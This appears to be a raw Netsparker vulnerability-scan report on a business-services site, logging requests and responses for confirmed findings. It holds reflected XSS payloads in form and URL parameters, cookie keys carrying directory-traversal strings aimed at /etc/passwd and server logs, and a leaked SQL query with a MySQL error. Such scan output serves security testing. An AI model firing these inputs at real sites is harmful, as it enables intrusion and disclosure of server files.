Parameter                 Type  Value
companyName               POST  Smith
emailAddress              POST  netsparker@example.com
firstName                 POST  Smith
lastName                  POST  '"--></style></script><script>alert(0x0004E7)</script>
password1                 POST  3
password2                 POST  3
pseudonym                 POST  3
receiveSpecialOfferEmail  POST  netsparker@example.com
refererUrl                POST  http://www.insideup.com/index.html
termsOfService            POST  3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 323
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004E7)%3c%2fscript%3e&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:02 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=A4A2AF934F4388311D539868EB15DCA7; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" 
action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /ppc/leadflow/wede00/

/ppc/leadflow/wede00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0004EF)</script>

Request

GET /ppc/leadflow/wede00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004EF)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9sj3d70vg3dbpkso5iiut7lqu0; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>' OR prj.project_page_url = 'leadflow/wede00/?nsextt='"--></style></script><script>netsparker(0x0004EF)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0004EF)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/

/ppc/leadflow/ CONFIRMED

http://www.insideup.com/ppc/leadflow/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..

Parameters

Parameter Type Value
